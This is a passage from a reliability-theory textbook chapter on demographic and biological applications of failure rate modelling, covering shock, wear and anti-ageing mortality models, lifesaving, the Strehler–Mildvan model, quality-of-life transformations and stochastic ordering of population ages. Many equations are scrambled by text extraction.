exp{tW } f ( w)dw . 0 Failure occurs when the accumulated wear reaches the initial resource R . Other important assumptions from the computational point of view are: the Cdf of R is exponential with the failure rate μ 0 and the process of shocks is the nonhomogeneous Poisson process with rate ν (t ) . After cumbersome technical derivations (Cha and Finkelstein, 2008), the following equation for the mortality (failure) rate can be obtained: μ (t ) = (1 − M W (− μ 0 )(1 − θ (t )))ν (t ) . It is clear that when W = 0 (this means that shocks do not increase wear), this formula reduces to (8.5). If W follows the exponential distribution with mean m , then the corresponding mortality (failure) rate can be derived explicitly as (Cha and Finkelstein, 2008) ⎛ μ (t ) = ⎜⎜1 − ⎝ 1 − θ (t ) ⎞ ⎟ν (t ) . μ 0 m + 1 ⎟⎠ 246 Failure Rate Modelling for Reliability and Risk 10.3 Mortality Model with Anti-ageing Following contemporary biological views, assume that there exist two processes: ageing and anti-ageing (regeneration), to be modelled by stochastic processes of wear and anti-wear, respectively (Finkelstein, 2003b). Denote the resulting stochastic process with independent increments by Wt ρ . Assume that the process of anti-wear decreases each increment of wear. For example, Equation (10.11) is generalized in this case to Wt ρ+ Δt − Wt ρ = a (Wt )ε (Δt ) + b(Wt )Δt − ρ (t )[a(Wt )ε (Δt ) + b(Wt )Δt ] = (1 − ρ (t ))[a (Wt )ε (Δt ) + b(Wt )Δt ], ∀t ∈ [0, ∞) , (10.18) where ρ (t ) , 0 ≤ ρ (t ) ≤ 1 , is a decreasing function (the case of a decreasing stochastic process ρt , t ≥ 0 , which is independent of the process of wear Wt , can be considered as well). Assume also that ρ (t ) → 0 as t → ∞ , which means that the anti-ageing mechanism deteriorates with age. Therefore, this function describes the ability of an organism to decrease its wear in each increment. Similar to the previous section, we will model biological ageing by the process Wt ρ . Ageing for humans actually starts at the age of maturity, i.e., 25 to 30 years. This means that ρ (t ) is very close or equal to 1 up to this age. The described combined process of wear and anti-wear can be defined directly via the rate of diffusion wt , i.e., (10.19) wtρ = (1 − ρ (t )) wt . We will use this convenient definition in what follows. This means that the rate of diffusion is smaller due to the anti-ageing mechanism by the time-dependent factor (1 − ρ (t )) . Thus, the formulas of the previous section can be written with the obviρ ous substitution of wt by wt . Equation (10.9), for example, becomes ⎡ ⎛t ⎞⎤ F (t ) = E ⎢ F0 ⎜ (1 − ρ (u )) wu du ⎟⎥ ⎟⎥ ⎜ ⎠⎦ ⎣⎢ ⎝ 0 (10.20) and Equation (10.10) is modified to μ (t ) = E[ wtρ μ 0 (Wt ρ ) | T > t ] = (1 − ρ (t )) E[ wt μ 0 (Wt ρ ) | T > t ] . (10.21) Specifically, when the mortality rate μ 0 (t ) = μ 0 is a constant, Equation (10.21) simplifies to μ (t ) = μ 0 (1 − ρ (t )) E[ wt | T > t ] . Equations (10.20) and (10.21) imply that Demographic and Biological Applications 247 ⎡ ⎛t ⎞⎤ E ⎢ F0 ⎜ (1 − ρ (u ))wu du ⎟⎥ ⎟⎥ ⎢⎣ ⎜⎝ 0 ⎠⎦ ⎫⎪ ⎧⎪ = 1 − exp⎨− ∫ (1 − ρ (u )) E[ wu μ 0 (Wuρ ) | T > u ]du ⎬ . ⎪⎭ ⎪⎩ 0 t Consider now the survival function F (t | x) , which describes the corresponding remaining lifetime, i.e., F (t | x) = F (t + x) F ( x) ⎧⎪ x+t ⎪⎫ = exp⎨− ∫ (1 − ρ (u )) E[ wu μ 0 (Wuρ ) | T > u ]du ⎬ . ⎪⎩ x ⎪⎭ As ρ (t ) → 0 for t → ∞ , the following asymptotic relationship holds: ⎧⎪ x+t ⎫⎪ F (t | x) = exp⎨− ∫ E[ wu μ 0 (Wuρ ) | T > u ]du ⎬ (1 + o(1)) . ⎪⎩ x ⎪⎭ (10.22) It follows from Equation (10.22) that when x → ∞ , the remaining lifetime still depends on the initial distribution F0 (r ) . Thus, the influence of the initial resource R is not fading out, as intuition would probably suggest. The model to be considered further is defined by the triple {R, wt , ρ t } (Finkelstein, 2003b). Assume that the human lifetime is programmed genetically at birth by the triple {R, wˆ t , ρˆ t } , where wˆ t and ρˆ t are ‘stochastic programs’. Realizations of these stochastic programs wˆ (t ) and ρˆ (t ) (as well as r0 ) are embedded individually at birth. Therefore, wˆ (t ), ρˆ (t ) describe the ‘designed’ trajectories for individuals in some baseline time scale, whereas realizations w(t ), ρ (t ) describe what is happening in the real life of an individual. Given a realization r0 , w(t ), ρ (t ) , the time to death td in our model is uniquely defined from the following equation: td r0 = (1 − ρ (u ) w(u )du . (10.23) 0 We can assume the following genetic interpretation of the triple. Different (not related) individuals have stochastically independent triples. A reasonable assumption is that the parents and their offspring have dependent triples. Thus, e.g., F0 (r ) should be understood as some averaged, marginal distribution whereas the conditional distribution should be defined by the corresponding history (information on the parents and grandparents, for instance). Identical twins or the outcomes of cloning are genetically identical and must exhibit the maximal extent of dependence between their triples. Therefore, it can be supposed for simplicity that they are embedded at birth with identical realizations r0 , wˆ (t ), ρˆ (t ) . Does this mean that 248 Failure Rate Modelling for Reliability and Risk actual realizations w(t ) and ρ (t ) , and consequently the time of death td , will be the same? An obvious answer is negative, because, for example, • Realization of these programs in real time can be influenced by external factors effecting the ‘designed at birth’ baseline time scale; The programs can have errors (bugs). These errors can be embedded at birth or acquired during the lifetime. A number of biological theories agree that errors in the processes of repair, replication and transcription of DNA are responsible for ageing (Cunningham and Brookbank, 1988). The role of genetics at the ‘global level’ is illustrated, e.g., by the classical studies on the age at death of 58 sets of identical twins in Bankand and Jarvic (1978). The corresponding intrapair mean difference in age of death is about 3 years, and it is 6 years for non-identical twins of the same sex. Also, humans whose parents and grandparents lived long live on average six years longer than those whose parents and grandparents died before the age of 50 (Cunningham and Brookbank, 1988). In the context of our triple mode, the following interesting question arises: what is more important in defining the time of death, the initial resource R or the process of anti-wear defined by ρ (t ) ? The answer obviously depends on the shape of ρ (t ) , and this is illustrated by the following example. Example 10.3 Consider two marginal cases. Let ρ (t ) decreases to 0 very sharply. Then, for sufficiently large t t t (1 − ρ (u )) w(u )du ≈ w(u )du , 0 (10.24) 0 implying that, if r0 is not too small, then t d ≈ t d0 , where td0 denotes the time of death in Model (10.23) when ρ (t ) ≡ 0 (there is no anti-ageing). ~ On the other hand, let ρ (t ) be a step function for some t > 0 , i.e., ⎧1, 0 ≤ t < ~ t, ~ ⎩0, t ≥ t . ρ (t ) = ⎨ Then t t ~ (1 − ρ (u )) w(u )du = w(u )du , t ≥ t . ∫ ~ t 0 ~ ~ ~ This means that td = t + td , where td is obtained from Equation (10.23). Note that ~ the lower limit of integration in (10.23) is substituted by t and the upper limit is ~ ~ substituted by t + td , i.e., r0 = ~ ~ t + td ∫ (1 − ρ (u)w(u)du . ~ t Demographic and Biological Applications 249 ~ ~ ~ ~ Assume that t >> td , which implies that td ≈ t . This assumption means that t is sufficiently large and the wear is sufficiently ‘intensive’. Therefore, the anti-wear process is more important in defining td than r0 (given it is not too large) in this marginal case. The shape of ρ (t ) can be rather close to the step function (10.24). For humans it is very close to 1 up to 25 to 30 years, decreases rather slowly up to middle age and then decreases more substantially up to 70 to 80 years. Eventually it drops sharply. This shape can be considered as a baseline for ρ (t ) . We do not need special biological evidence to prove a lifetime dependence on environment. There can be different ways to model the impact of environment. In the context of our triple model, assume that ageing and anti-ageing processes depend on some overall environmental (lifestyle) scalar parameter l , which (for simplicity) does not depend on t , i.e., wt (l ), ρ t (l ) . It should be understood, however, that quantifying l is a very difficult task. Therefore, it is reasonable to use only some general qualitative considerations and simple clarifying examples. For instance, different lifestyles of humans can be ordered by the value of parameter l . Let l g stand for a ‘good lifestyle’ and lb for a ‘bad lifestyle’ and l g < lb . Therefore, ageing is more intensive and anti-ageing is less intensive for a ‘bad lifestyle’, i.e., ρ (t , l g ) > ρ (t , lb ), ∀t ∈ (0, ∞) , w(t , l g ) < w(t , lb ), ∀t ∈ (0, ∞) . It is reasonable to use the accelerated life model (ALM) defined by Equation (5.2) for this kind of modelling. Assume that the scale transformation function for the case under consideration is linear. Therefore, generalizing Equation (10.19) in realizations leads to w(t , ρ , l ) ≡ (1 − ρ (lt )) w(lt ) . (10.25) The case l = 1 corresponds to the baseline process (1 − ρ t ) wt . The ALM describes the change in ‘biological time’ for our model owing to the environmental influence. This interpretation is close to our virtual age-based reasoning of Chapter 5. Let 0 < l g < 1 < lb and t d (l ) denote the time of death in a realization with the scale parameter l . Similar to (10.23), and changing the variable of integration to y = l u , the following equation is obtained: r0 = td ( l ) ∫ 0 (1 − ρ (l u ) w(l u )du = 1 l l td ( l ) ∫ (1 − ρ ( y)w( y)dy . (10.26) 0 If the difference in lifestyles lb − l g is sufficiently large, the difference t d (l g ) − t d (lb ) can also be large. This is clearly seen, because owing to our assumptions, the integrand on the right-hand side of (10.26) is an increasing function. In this way, we can compare the impacts of r0 and l on the time of death. The following example illustrates this reasoning. 250 Failure Rate Modelling for Reliability and Risk Example 10.4 Assume that the dependence on l in w(t , l ) can be ignored and consider the setting of Example 10.3. It can be shown (Finkelstein, 2003b) that the difference in the corresponding lifetimes in this case is ~ ⎛ lb − l g t d (l g ) − t d (lb ) = t ⎜ ⎜ lb l g ⎝ ⎞ ~ ⎟ + ( td (l g ) − ~ td (lb )) . ⎟ ⎠ (10.27) Under the same assumptions as in Example 10.3, the second summand on the right ~ hand side of (10.27) can be ignored. Therefore, if t is sufficiently large and lb − l g is not too small, we can say that the impact of lifestyle is decisive. This example prompts a more general conjecture: the influence of the embedded (genetic) parameters is ‘damped’ by the impact of environment at least for sufficiently old individuals. 10.4 Mortality Rate and Lifesaving Mortality of humans in developed countries is declining with time, which is a consequence of improving conditions of life. By “conditions of life” or mortality conditions we mean the whole range of factors, with healthcare quality being the major one. Numerous advances in healthcare have resulted in saving lives (lifesaving) of humans, where previously these lives were lost. Therefore, life expectancy at birth and other characteristics are improving. Oeppen and Vaupel (2002) state, for instance, that female life expectancy in the country with the maximum life expectancy (currently Japan) is increasing every year by approximately three months. This trend has been observed already for more than 50 years. The Gompertz law of human mortality (10.1) usually gives a reasonable fit to the real demographic data for ages beyond 30. Assume that this model is used for fitting mortality data in a developed country at some calendar time t0 (e.g., t0 = 1950) . As in Equation (10.4), denote the corresponding period mortality rate by μ ( x, t0 ) , where x is the age at death. Bongaarts and Feeney (2002) show that the mortality rate in contemporary populations with a high level of life expectancy tends to improve over time by a similar factor at all adult ages, which defines the Gompertz shift model: μ ( x, t ) = θ (t ) μ ( x, t0 ), t > t0 , θ (t0 ) = 1 , (10.28) where the function θ (t ) is decreasing with time t and does not depend on age x . This model was verified using contemporary data for different developed countries and the corresponding values for θ (t ) were obtained (see also e.g., Oopen and Vaupel, 2002). Equations (10.1) and (10.28) also show that the logarithms of mortality rates at different time instants are practically parallel. Note that (10.28) can be also obviously interpreted as the proportional hazards (PH) model (Section 7.3). The relevant natural example of the described lifesaving is the convergence of mortality rates of ‘old cohorts’ after the reunification of East and West Germany at t0 = 1990 (Vaupel et al., 2003). Mortality rates in East and West Germany differed noticeably before the reunification, and the East German rates had improved to the Demographic and Biological Applications 251 level of those of the West shortly thereafter. This is a consequence of a direct (better healthcare) and of an indirect (better environment eliminates some causes of death) lifesaving. It is worth noting that the older the cohorts were, the more pronounced this effect was, as the quality of the healthcare is more important for older subpopulations. In what follows we will describe probabilistically the simplified cohort version of lifesaving. Let μ (t ) , as previously, denote the cohort mortality rate for some population. Suppose that for some reason (e.g., better healthcare), μ (t ) is reduced to a new level μ r (t ) to be modelled by a function θ (t ), 0 < θ (t ) ≤ 1, ∀t ≥ 0 as μ r (t ) = θ (t ) μ (t ) . (10.29) We see that Relationship (10.29) (in a slightly different notation) is the cohort version of the Gompertz shift model (10.28). The following useful reasoning can give a reasonable justification of (10.29) in terms of lifesaving. Assume that each life, characterized by the initial mortality rate μ (t ) , is saved (cured) with probability 1 − θ (t ) (or, equivalently, a proportion of individuals who would have died are now resuscitated and given another chance). Those who are saved experience a minimal repair (Section 4.3.1). The number of resuscitations (repairs) is unlimited. Under these assumptions, it was proved analytically in Vaupel and Yashin (1987) that the described lifesaving procedure results in the mortality rate given by Equation (10.29). As a corollary to this result, a point process of saved lives is the NHPP with rate μ s (t ) = (1 − θ (t )) μ (t ) . A result similar to (10.29) was obtained for different reliability-related settings by Brown and Proschan (1983) (for θ (t ) ≡ θ ) , Block et al. (1985) and Finkelstein (1999a), where an object (organism) subject to the non-homogeneous Poisson process of shocks (e.g., diseases) with rate μ (t ) was considered. It was assumed that a shock, affecting an object at time t ∈ (0, ∞) , independently of the previous shocks, causes a failure (death) with probability θ (t ) and is harmless to an object with a complementary probability 1 − θ (t ) . Then the mortality (failure) rate is given by Equation (10.29) (see Section 8.2 for details). We will proceed with applications of this model in the next section. It is important for demographic practice to define the lifesaving ratio Rθ (t ) in terms of the mean remaining lifetime as improvements in medical, socio-economic and environmental conditions usually have a more substantial effect on older people. In accordance with Equation (2.7), this ratio can be defined as ⎧⎪ t + x ⎫⎪ exp⎨− θ (u ) μ (u )du ⎬dx ⎪ ⎪⎭ Rθ (t ) = 0 ∞ ⎩ t t + x . ⎧⎪ ⎫⎪ exp⎨− μ (u )du ⎬dx ⎪⎩ t ⎪⎭ 0 ∞ 252 Failure Rate Modelling for Reliability and Risk Example 10.5 Let μ (t ) ≡ μ and θ (t ) is a step function (young people are perfectly cured, whereas old people are not cured at all), i.e., ⎧0, θ (t ) = ⎨ ⎩θ , 0 ≤ t < t0 , t ≥ t0 . Then ⎧⎪μ (t0 − t ) + θ −1 , Rθ (t ) = ⎨ −1 ⎪⎩θ , 0 ≤ t < t0 , t ≥ t0 . This function decreases in t for 0 < t < t0 and then equals θ −1 for t ≥ t0 . 10.5 The Strehler–Mildvan Model and Generalizations In this section, we will justify and generalize the application of the shock model (8.5) (see also Example 10.2). As in Section 10.2 (Equation (10.9)), consider the first passage-type setting but with an additional feature of ‘killing’ events (Singpurwalla, 1995; Aven and Jensen, 1999). Let Wt , t ≥ 0 denote an increasing stochastic process of damage accumulation and let R(t ) be a function that defines the corresponding boundary. Death occurs when Wt exceeds R(t ) for the first time. Let, as previously, W (t ) denote the increasing realization of this process. The time-independent case R(t ) = R (initial resource) was considered in Section 10.2. Let Pt , t ≥ 0 be a point process of external instantaneous harmful events (external stresses or demands for energy) with rate ν (t ) . Following reliability terminology, we will call these events “shocks”. As previously, assume that each shock results in death with probability θ (t ) and is ‘survived’ with the complementary probability 1 − θ (t ) . This can be now interpreted in the following more detailed way: each shock has a random magnitude Yi = Y , i = 1,2,... with a common distribution function G ( y ) . Death at age t occurs when this magnitude exceeds R(t ) − W (t ) . Therefore, the function θ (t ) that was previously unspecified has now the following clear probabilistic meaning: θ (t ) = Pr[Y > R(t ) − W (t )] = 1 − G ( R(t ) − W (t )) . (10.30) We also assume for simplicity that a shock is the only cause of death. The corresponding generalization to the case when death also occurs when W (t ) reaches the boundary R (t ) can be performed as well (Finkelstein, 2007d). In the original Strehler–Mildvan (1960) model, which was widely applied to human mortality data (see Riggs and Millecchia, 1992; Riggs and Hobbs, 1998, among others), our R(t ) − W (t ) means the remaining vitality at time t . It was also supposed in this model that this function linearly decreases with age, which can be a reasonable assumption, as some biological markers of human ageing can behave linearly (Nakamura et al., 1998). But an important, unjustified assumption was that the distribution function G ( y ) is exponential (Yashin et al., 2000). The combination of Demographic and Biological Applications 253 linearity of R(t ) − W (t ) and of exponentiality of G ( y ) results in the exponential form of the corresponding mortality rate, and therefore cannot be considered a justification of the empirical Gompertz law of human mortality. Arbeev et al. (2005) consider modification of this model and apply it to modelling human cancer incidence rates. They assume that R(t ) − W (t ) is decreasing exponentially. Our approach, based on Equation (10.29), does not need additional assumptions on G ( y ) and R(t ) − W (t ) . Note that Equation (10.29) was obtained under the crucial assumption that the point process of shocks is the NHPP. Therefore, the corresponding survival function is similar to (8.5), i.e., ⎧⎪ t ⎫⎪ F (t ) = exp⎨− θ (u )ν (u )du ⎬ . ⎪⎩ 0 ⎪⎭ Unfortunately, Strehler and Mildvan (1960) did not make this crucial assumption. Equation (10.29) states that the resulting mortality rate is the simple product of the rate of the Poisson process and of the probability θ (t ) . Therefore, its shape can be easily analysed. When R(t ) − W (t ) decreases, the probability θ (t ) increases with age, which is in line with the accumulation of degradation reasoning. If, additionally, the rate of harmful events ν (t ) is not decreasing, or not decreasing faster than θ (t ) is increasing, the resulting mortality rate μ (t ) is also increasing. The following possible scenarios can result in a decreasing mortality rate μ (t ) (other cases can also be considered as in Finkelstein, 2007d): • θ (t ) is decreasing, as the boundary function R(t ) is increasing faster than W (t ) : additional vitality is additively ‘earned’ by an organism with age. Let, for instance, W (t ) = wt , R (t ) = bt ; 0 < w < b . Then θ (t ) = Pr[Y > R(t ) − W (t )] = 1 − G ((b − w)t ) is decreasing in t ; The rate of initial harmful events ν (t ) is decreasing. This assumption can be quite realistic, e.g., for human populations in developed countries when the exposure to stresses of different kinds decreases at advanced ages. Thus, the case of ‘negative ageing’ can still formally occur within the framework of the suggested generalized Streller–Mildvan model. In the next section we will show how in some instances the ‘unnatural’ mortality rate can be transformed. 10.6 ‘Quality-of-life Transformation’ We have briefly discussed several of the simplest ageing classes of distributions in Chapter 3. Although it is a common perception in the biological and demographic sciences that the shape of the mortality rate alone is sufficient for defining ageing properties of organisms, this is not true. In fact, the accumulated damage, which is responsible for the age-related changes, combined with other factors, eventually determines the shape of the mortality rate. Specifically, the additive degradation models can often (but not always; see the previous section) result in an increasing 254 Failure Rate Modelling for Reliability and Risk mortality rate (Sumita and Shanthikumar, 1985). It seems intuitively unnatural that a degradable object can be characterized by a decreasing mortality rate. Therefore, a regularization procedure will now be suggested, which can eventually result in the increasing ‘mortality’ rate for a supplementary lifetime random variable (Finkelstein, 2007d). Denote by q(t ) ≤ 1 a quality of life index at age t . The function q(t ) defines a weight that is given to the unit increment of life at age t . Humans at advanced ages usually have restrictions of various kinds showing a substantial deterioration in vitality and functions that decrease the quality of life at this stage. Although formally vitality and ‘functioning’ decrease at all adult ages, the noticeable decline in the corresponding quality of life due to these processes occurs usually only at relatively advanced ages. These considerations are somehow similar to the starting point of the Quality Adjusted Life Years (QALYs) approach (see, e.g., Humnik et al., 2001), but our goal is different. The QALYs approach is focused on solving individual healthcare decision problems, when, for instance, an operation with probability p can add a number of quality years ( q = 1 ) but can also result in death ( q = 0 ) with probability 1 − p , whereas without the operation a patient lives with a lower quality of life, i.e., q < 1 . Our interest is not in a specific deterioration in abilities of individuals with concrete health problems, but rather in modelling a general trend, which shows the decline in quality of life as a manifestation of senescence. Therefore, we will assume that q(t ) = 1, t ∈ [0, t s ) and that this function monotonically decreases for t ≥ ts , where t s is the starting age of senescence: a noticeable decline in ‘abilities and possibilities’. Let, as previously, T be a lifetime random variable with the Cdf F (t ) and the mortality rate μ (t ) . Denote by Q(T ) a ‘weighted lifetime’: a random variable weighted in accordance with the quality of life function q (t ) , i.e., T Q(T ) = q(u )du , (10.31) 0 where the function q(t ) should be such that Q(∞) = ∞ . When q(t ) ≡ 1 , the lifetimes are equal: Q(T ) = T . Thus, Q(T ) in an ‘integrated way’ already reflects not only the length of life but its quality as well. The distribution function of Q(T ) is derived easily via the generic Cdf F (t ) as Pr[Q(T ) ≤ t ] = Pr[T ≤ Q −1 (t )] = F (Q −1 (t )) , (10.32) where Q −1 (t ) is the inverse function to Q(t ) , which exists and increases as the function Q(t ) increases. In accordance with the definition, the corresponding mortality rate μ q (t ) is μ q (t ) = = d ( F (Q −1 (t )) . dt (1 − F (Q −1 (t )) d ( F (Q −1 (t )))d (Q −1 (t )) d (Q −1 (t )) = μ (Q −1 (t )) . dt d (Q −1 (t ))dt (10.33) Demographic and Biological Applications 255 Our intention now is to show that, for example, in the case of the ultimately decreasing mortality rate μ (t ) , which is usually qualified as negative senescence, the function μ q (t ) can still increase, which is somehow more intuitively acceptable for models with degradation. Note that negative senescence is not just a theoretical concept, as it can be encountered in nature (certain plants and fish have the constant or decreasing mortality rates). It is natural to model q(t ) as a decreasing power function for large t. A generalization to the regularly varying functions (Bingham et al., 1987) is rather straightforward. Let q(t ) ∝ t −α , 0 < α < 1 . By this notation we mean proportionality. The case α = 1 will be considered separately, whereas the range α > 1 is not allowed, as the function Q(t ) should take the value of infinity at t = ∞ . Under these assumptions k n Q(t ) ∝ t −α +1 = t n , k < n; Q −1 (t ) ∝ t k . It follows from (10.33) that, for a constant mortality rate μ (t ) , the rate μ q (t ) is already increasing and μ q (t ) ∝ t n / k −1 . It is easy to see that it will still be increasing even for decreasing mortality rate μ (t) ∝ t − β , if 0 < β < 1 − k / n . Thus, under some reasonable assumptions, a regularization procedure has been performed resulting in the increasing rate μ q (t ) . The following example deals with the case α =1. Example 10.6 Let F (t ) = 1 − exp{− μ t} and ⎧1, ⎪ q(t ) = ⎨ k ⎪ (t − t ) + k , s ⎩ t ≤ ts , t > ts . where k > 0 , which means that q(t ) ∞ k / t for sufficiently large t . Therefore, t ≤ ts , ⎧t , ⎪ Q(t ) = ⎨ ⎡ ⎛ t − ts ⎞⎤ ⎪t s + k ⎢ln⎜ k + 1⎟⎥, t > t s . ⎠⎦ ⎣ ⎝ ⎩ (10.34) It is easy to see that the inverse function Q −1 (t ) is linear in [0, t s ] and is exponentially increasing for t > t s . It follows from Equations (10.33) and (10.34) that μ q (t ) is also increasing for t > ts and is constant in [0, t s ] . Thus, μ q (t ) already has the desired non-decreasing shape. 10.7 Stochastic Ordering for Mortality Rates We continue now describing the properties of age-specific mortality rates μ ( x, t ) , where x is the age at death and t is the corresponding calendar (chronological) 256 Failure Rate Modelling for Reliability and Risk time. We combine here methods and approaches of modern mathematical demography (Kefytz and Casewell, 2005) with the corresponding reliability-related reasoning. Equations (10.4)–(10.6) define the mortality rate μ ( x, t ) and the age X t for a population at the calendar time t with an age structure N ( x, t ) . Now let N ( x, t ), x ≥ 0 and N ∗ ( x, t ), x ≥ 0 , be age structures for two populations with random ages X t and X t∗ , respectively (Finkelstein, 2005a). The corresponding definitions are given in Section 10.1. Specific types of these age structures will be considered later, but now we are interested in the stochastic comparison of X t and X t∗ for a fixed t . In accordance with Definition 3.4 (Equation (3.40)), we say that the age X t∗ defined by the age structure N ∗ ( x, t ), x ≥ 0 is stochastically larger than the age X t defined by the age structure N ∗ ( x, t ), x ≥ 0 and write X t∗ ≥ st X t (10.35) if the corresponding age distribution functions are ordered as F ∗ ( x, t ) ≤ F ( x, t ), ∀x > 0 . (10.36) As follows from (10.6), Inequality (10.36) is equivalent to x ∗ ∫ N (u, t )du 0 ∞ ∫N x (u, t )du 0 ∫ N (u, t )du 0 ∞ ; ∀x > 0 , (10.37) ∫ N (u, t )du 0 and the age structure N ∗ ( x, t ), x ≥ 0 gives larger probabilities to ages beyond x , than N ( x, t ), x ≥ 0 . Stochastic comparison of populations at different time instants can also be of interest. The following inequality: X t ≥ st X t ; t 2 > t1 2 1 means that the population with the age structure N ( x, t 2 ), x ≥ 0 is stochastically older than the population with the age structure N ( x, t1 ), x ≥ 0 , which certainly is the case in practice (under reasonable restrictions on fertility and migration), because mortality rates (at least in the developed countries) are declining with t . If this inequality holds for all ordered t1 and t 2 in some interval of time, we say that the population is ageing in this interval of time. 10.7.1 Specific Population Modelling We have already stated in Section 10.1 that, whereas the period mortality rate μ ( x, t ) is properly defined by Equation (10.4), the corresponding lifetime random variable for the period setting cannot be unambiguously defined only via μ ( x, t ) . Additional simplifying assumptions should be employed, and this is what is usually Demographic and Biological Applications 257 done in applications. On the other hand, we know, that in accordance with exponential representation (2.5), the failure rate λ (t ) always defines the corresponding absolutely continuous distribution function for the cohort setting. Consider a population that is closed to migration and experiences a constant birth rate B0 annually. These simplifying assumptions are very natural and allow for detailed mathematical modelling. The age structure in this case can be defined via the corresponding cohort survival function, i.e., ⎧⎪ x ⎪⎫ N ( x, t ) = B0 exp⎨− ∫ μ (u , t − x + u )du ⎬ ⎪⎩ 0 ⎪⎭ ≡ B0 lc ( x, t − x) , (10.38) where lc ( x, t − x) denotes the life table survival probability of a cohort of age x born at time t − x and μ (u , t − x + u ) is the mortality rate for this cohort. Therefore, the lifetime random variable is defined for a cohort of age x via the corresponding Cdf. Equation (10.38) and some of the forthcoming considerations can be generalized to the case of time-dependent birth rates, but for simplicity we assume that B0 is a constant. On the other hand, all generalizations that consider migration are usually extremely difficult. Let N ( x, t ), x ≥ 0 be the same population age structure as in (10.38). As in Bongaarts and Feeney (2002), we now artificially ‘freeze’ the mortality conditions at time t in the following way: x ⎪⎧ ⎪⎫ N ( x, t ) = B0 exp⎨− ∫ μ ∗ (u , t )du ⎬ . (10.39) ⎪⎩ 0 ⎪⎭ The function μ ∗ ( x, t ) can be now interpreted as the mortality rate for a stationary population with the age structure N ( x, t ), x ≥ 0 . Therefore, the corresponding lifetime random variable can also be defined via μ ∗ ( x, t ) in the usual way using the exponential representation for the Cdf. Note that, although the integrals (and therefore the corresponding survival functions) in Equations (10.38) and (10.39) are obviously equal, the integrands are not equal. On the other hand, the exponential representation via the mortality rate μ ( x, t ) for the same age structure reads (Preston and Coale, 1982) ⎧⎪ x ⎫⎪ ⎧⎪ x ⎫⎪ N ( x, t ) = B0 exp⎨− ∫ μ (u, t )du ⎬ exp⎨− ∫ I (u, t )du ⎬ , ⎪⎩ 0 ⎪⎭ ⎪⎩ 0 ⎪⎭ where I (u , t ) is the intensity of a population growth, i.e., I ( x, t ) = ∂N ( x, t ) / ∂t . N ( x, t ) (10.40) 258 Failure Rate Modelling for Reliability and Risk It can be seen from Equations (10.38)–(10.40) that x x 0 0 ∫ I (u, t )du = ∫ (μ (u, t − x + u ) − μ (u, t ))du and I ( x , t ) = μ ∗ ( x, t ) − μ ( x , t ) in this specific case (see also Arthur and Vaupel, 1984). Equation (10.40) can formally be transformed into ⎧⎪ x ⎪⎫ N ( x, t ) = B0 exp⎨− ∫ μ (u, t ) D(u, t )du ⎬ , ⎪⎩ 0 ⎪⎭ (10.41) where D ( x, t ) = 1 + I ( x, t ) (10.42) μ ( x, t ) is a distortion factor for the case of mortality that is changing in time. If, for example, a population is growing, D( x, t ) > 1 . Under additional assumptions (see later), Bongaarts and Feeney (2002) show that D( x, t ) does not depend on age x and they develop methods for calculating the corresponding bias for life expectancy. Consider now a hypothetical population (also closed to migration and with a constant birth rate B ∗ ) and define a new hypothetical age structure N ∗ ( x, t ), x ≥ 0 via the mortality rate μ ( x, t ) as ⎧⎪ x ⎪⎫ N ∗ ( x, t ) = B ∗ exp⎨− ∫ μ (u , t )du ⎬ . ⎪⎩ 0 ⎪⎭ (10.43) Therefore, μ ( x, t ) can also be interpreted as the mortality rate for a stationary population with the age structure N ∗ ( x, t ), x ≥ 0 . Equations (10.38)–(10.43) will be used for comparing the Cdfs of X t∗ and X t and also for comparing different definitions of life expectancy. To proceed with these comparisons we need a useful and simple lemma (Finkelstein, 2005a). Lemma 10.1. Let f (x) and g (x) be continuous functions such that g (x) is decreasing and the integral of f (x) in [0, ∞) is finite. Then x ∫ 0 ∞ x f (u ) g (u )du > ∫ f (u)du 0 ∞ ∫ f (u) g (u)du ∫ f (u)du 0 0 , ∀x > 0 . Demographic and Biological Applications 259 Proof. Applying the mean value theorem: x x = 0 ∞ ∫ f (u ) g (u)du f (u ) g (u )du 0 x f (u ) g (u )du 0 0 f (u ) g (u )du + ∫ f (u ) g (u ) x x = x g (0, x) ∫ f (u )du 0 x 0 x g (0, x) ∫ f (u )du + g ( x, ∞) ∫ f (u )du > ∫ f (u)du 0 ∞ , ∫ f (u)du 0 where g (0, x) and g (0, ∞) are the corresponding mean values, which exist due to our assumptions. As g (x) is decreasing, g (0, x) > g (0, ∞) , and therefore the inequality follows. The following result (Finkelstein, 2005a) shows that random ages X t∗ and X t are ordered as in Inequalities (10.35) and (10.36), which define the usual stochastic ordering. Theorem 10. 1. Let the mortality rate μ ( x, t ) decrease in calendar time t . Assume that population age structures N ( x, t ), x ≥ 0 and N ∗ ( x, t ), x ≥ 0 are given by Equations (10.39) and (10.43), respectively. Then Ordering (10.35) holds. Proof. In accordance with Inequality (10.36) and Equations (10.40) and (10.43), we must show that x ⎧⎪ y ⎫⎪ ⎧⎪ y ⎧⎪ y ⎫⎪ ⎪⎫ − − μ μ exp ( u , t ) du dy exp ( u , t ) du exp ⎨ ⎬ ⎬ ⎨ ⎨− ∫ I (u, t )du ⎬dy ∫0 ⎪ ∫0 ∫ ∫ ⎪⎭ ⎪⎭ ⎪⎩ 0 ⎪⎩ 0 ⎪⎭ 0 ⎩ 0 and the corresponding exponential function in the integrand is monotonically decreasing with y . Therefore, the result immediately follows from Lemma 10.1 after noting that ⎧⎪ y ⎫⎪ exp ∫0 ⎨⎪− ∫0 μ (u, t )du ⎬⎪dy < ∞ . ⎩ ⎭ ∞ 260 Failure Rate Modelling for Reliability and Risk Under the foregoing assumptions, this result can be interpreted as follows: A random age X t in the observed population is stochastically smaller than a random age X t∗ in a hypothetical population constructed via the current mortality rate μ ( x, t ) at time t . Lemma 10.2. Let the mortality rate μ ( x, t ) decrease in time t . Assume that population age structures N ( x, t ), x ≥ 0 and N ∗ ( x, t ), x ≥ 0 are given by Equations (10.40) and (10.43), respectively. Then x ∗ ∫ μ (u, t ) N (u, t )du 0 ∞ ∫ μ (u, t ) N x 0 . ∫ μ (u, t ) N (u, t )du (u , t )du 0 0 Proof. Substituting Relationships (10.40) and (10.43) into this inequality: ⎧⎪ x ⎫⎪ y ∫ μ ( y, t ) exp⎨− ∫ μ (u, t )du ⎬dy ⎪⎩ 0 ⎪⎭ y ⎧⎪ ⎫⎪ ∫0 μ ( y, t ) exp⎨⎪− ∫0 μ (u, t )du ⎬⎪dy ⎩ ⎭ 0 ⎧⎪ ⎪⎩ x 0 ∞ ∫ μ ( x, t ) N ( x, t )dx ∫ xN ( x, t )dx 0 ∞ . (10.48) ∫ N ( x, t )dx 0 0 To prove this inequality, it is sufficient to consider the ‘modified’ population age structure 